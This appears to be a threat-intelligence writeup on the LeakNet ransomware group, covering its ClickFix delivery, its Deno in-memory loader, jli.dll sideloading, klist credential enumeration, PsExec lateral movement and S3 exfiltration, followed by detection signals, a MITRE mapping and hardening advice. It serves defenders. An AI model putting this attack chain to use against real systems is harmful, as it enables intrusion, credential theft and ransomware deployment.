LeakNet is an emerging ransomware operator that entered the threat landscape in late 2024. Averaging about three victims per month, the group is now scaling up and shifting tactics — and two developments stand out: a social engineering technique called ClickFix delivered through compromised legitimate websites, and a previously unreported Deno-based in-memory loader that executes payloads almost entirely in memory. This is not an incremental upgrade. It is a deliberate re-architecture of the group’s attack pipeline from procurement-dependent to self-sustaining.
Stage 1 — Initial Access: ClickFix via Compromised Websites
LeakNet’s entry method has shifted from buying stolen credentials through IABs to running its own delivery campaigns. LeakNet leverages compromised legitimate websites to host ClickFix lures — fake error messages and verification pages, including spoofed Cloudflare Turnstile prompts — that trick users into executing msiexec commands.
The operational advantage here is substantial. By generating their own entry points, the attackers bypass the need to wait for valuable accounts to appear on dark web markets, greatly reducing their cost per victim and allowing them to cast a wide net targeting anyone browsing the web.
The ClickFix pages prompted users to run a Windows Installer command through msiexec — that command downloaded and ran a loader associated with LeakNet. The delivery appeared opportunistic rather than targeted: any employee who encounters the lure could become an entry point.
A second confirmed delivery vector adds further scope. ReliaQuest also observed an intrusion attempt in which threat actors used Microsoft Teams-based phishing to socially engineer a user into launching a payload chain that ended in a similar Deno-based loader — signalling either a broadening of LeakNet’s initial access vectors, or that other threat actors have adopted the technique.
Stage 2 — Execution: The Deno BYOR Loader
This is the most technically significant component of LeakNet’s updated arsenal. Rather than deploying a custom malicious binary that might trigger security tools, the attackers install the real, trusted Deno executable on the victim’s machine and use it to run malicious code. In observed activity, that process was initiated through Visual Basic Script (VBS) and PowerShell scripts, cleverly named Romeo.ps1 and Juliet.vbs.
The key evasion mechanism is memory-only execution. Rather than writing a JavaScript file to disk where it could be scanned, LeakNet feeds the payload to Deno as a base64-encoded data URL, which Deno decodes and runs entirely in memory.
The payload is designed to fingerprint the compromised system, contact an external server to fetch next-stage malware, and enter into a polling loop that repeatedly fetches and executes additional code through Deno.
From a detection standpoint, because Deno is a trusted tool, standard security blocklists often ignore its activity — leaving almost no evidence on the hard drive and making it extremely difficult for traditional antivirus software to detect.
Stage 3 — Post-Exploitation: The Repeatable Kill Chain
Despite evolving entry methods, the post-compromise chain is identical across every confirmed incident — and this consistency is simultaneously LeakNet’s operational strength and its defenders’ only reliable intercept window.
DLL Sideloading
A malicious jli.dll is placed in C:\ProgramData\USOShared — a directory associated with Windows Update activity — alongside a legitimate Java binary. The technique can appear routine at first glance because it uses familiar processes and locations.
C2 Beaconing
Beaconing occurred to multiple domains across incidents while maintaining a consistent URL structure — a behavioral fingerprint that creates a reliable detection opportunity even when specific domain indicators rotate.
Credential Enumeration
The group ran cmd.exe /c klist to list active authentication credentials on the compromised system before moving to other hosts — a low-noise pre-lateral-movement step that is often overlooked in standard monitoring baselines.
Lateral Movement
After credential enumeration, the group uses PsExec following Kerberos ticket enumeration to move laterally across the environment. PsExec usage from non-standard accounts in a non-admin context is the most detectable point in this entire chain.
Exfiltration and Staging
Malicious traffic is masked using S3 buckets and trusted cloud services, blending into expected enterprise traffic. Because S3 egress from enterprise endpoints is common in cloud-first environments, this is an intentionally low-signal exfiltration path.
Detection Opportunities
Shift detection focus away from the delivery layer and toward the behavioral signals that follow. Visibility into anomalies such as Deno running outside development environments, jli.dll sideloading in unexpected locations, and unusual PsExec usage is likely to offer the most reliable coverage against the techniques described.
Key behavioral signals to prioritize:
- Deno.exe executing outside developer user contexts or spawning from non-IDE parents
- msiexec commands spawned from browser processes or Win+R
- java.exe loading jli.dll from C:\ProgramData\USOShared
- cmd.exe /c klist followed within minutes by PsExec
- Outbound connections to newly registered domains or unexpected S3 buckets
MITRE ATT@CK Mapping
| Tactic | Technique ID | Technique Name | Observable / Evidence |
|---|---|---|---|
| Initial Access | T1566 / T1189 | Phishing / Drive-by Compromise | ClickFix via compromised website; Teams-based phishing |
| Execution | T1059.005 / T1059.001 | Visual Basic Script / PowerShell | Juliet*.vbs and Romeo*.ps1 initiating Deno loader |
| Defense Evasion | T1574.001 / T1620 | DLL Sideloading / Reflective Code Loading | jli.dll sideloaded via Java in USOShared; fileless Deno in-memory execution |
| Discovery | T1558 | Steal or Forge Kerberos Tickets | cmd.exe /c klist enumerating active Kerberos credentials |
| Lateral Movement | T1570 | Lateral Tool Transfer via PsExec | PsExec used post Kerberos enumeration to move laterally |
| Exfiltration | T1567.002 | Exfiltration to Cloud Storage | Data staged and exfiltrated via AWS S3 buckets |
| Command & Control | T1071 | Application Layer Protocol | Consistent URL-pattern beaconing to newly registered C2 domains |
Hardening Recommendations
Organizations should block newly registered domains, since LeakNet’s command-and-control servers are typically only weeks old. Regular users should be restricted from running Win-R commands on their workstations, and PsExec should be limited to authorized administrators through Group Policy Objects. Security teams should watch for jli.dll sideloading in the C:\ProgramData\USOShared directory, unusual PsExec activity, and unexpected outbound connections to S3 buckets. Isolating a compromised host the moment post-exploitation behavior is confirmed is the most direct way to break the chain before ransomware reaches deployment.
What This Really Means
LeakNet’s design philosophy reveals three things about the current ransomware economy. First, IAB dependency is becoming a strategic liability — groups that control their own delivery are harder to disrupt. Second, the BYOR technique is not a one-group innovation; fileless execution techniques that effectively evade traditional controls tend to spread, and the Deno loader is likely to draw attention from other threat actors as its effectiveness becomes more visible. Third, the repeatable post-exploitation chain is the group’s only structural weakness — and the only place where defenders currently have a reliable window to intercept this campaign.
Organizations still relying on signature-based endpoint detection and domain blocklists will not catch LeakNet until encryption has already begun. The detection window exists exclusively in the behavioral layer.
